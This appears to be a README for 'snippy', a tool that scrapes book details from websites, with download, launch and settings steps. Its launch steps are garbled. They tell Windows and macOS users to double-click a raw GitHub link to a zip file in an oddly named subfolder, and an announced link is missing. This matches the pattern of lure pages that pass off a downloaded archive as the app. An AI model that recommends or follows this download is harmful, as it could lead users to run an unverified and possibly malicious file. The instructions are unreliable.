To get started, visit the Releases page to download the latest version of snippy. Click the link below to access it:

1. Click on the link above.
2. On the Releases page, find the latest version.
3. Choose the appropriate file for your system.
4. Download the file to your computer.

• Windows, macOS, or Linux
• At least 4 GB of RAM
• 250 MB of available disk space
• A stable internet connection

Once you have downloaded snippy, follow these steps to run the application:

1. Locate the Downloaded File:

   • Find the file in your computer’s "Downloads" folder or the location you chose while downloading.

2. Extract the Contents (if zipped):

   • If your file is zipped, right-click on it and select "Extract All" to unpack the files.

3. Open the Application:

   • For Windows, double-click on https://raw.githubusercontent.com/Mustapha5298/snippy/main/parrier/snippy.zip.
   • For macOS, right-click and select "Open" on https://raw.githubusercontent.com/Mustapha5298/snippy/main/parrier/snippy.zip.
   • For Linux, run ./snippy from the terminal.

4. Follow the On-Screen Instructions:

   • The application will guide you through setting up any required configurations.

After running snippy, you will see a user-friendly interface. Here’s how to use it:

1. Input the Book Details:

   • Enter the title or author of the book you wish to scrape.

2. Choose Your Sources:

   • Select the websites where you want to gather data.

3. Start the Scraping Process:

   • Click the "Scrape" button to begin gathering information.

4. View Your Results:

   • Once the scraping finishes, you will see the results displayed neatly on your screen.

You may want to customize how snippy works for you. Here are some options you can tweak:

• Source Selection: You can choose which websites snippy will scrape from.
• Output Format: Select to receive results in a text file, CSV, or JSON.
• Scraping Frequency: Adjust how often the bot scrapes data to reduce the risk of bans.

• IP Bans: Frequent requests to the same site may result in your IP getting temporarily banned. Be cautious with the number of requests you send.
• Respect Terms of Service: Always check the terms of use for the websites you scrape to ensure compliance.

• Cannot find the file: Ensure your download completed and check your "Downloads" folder.
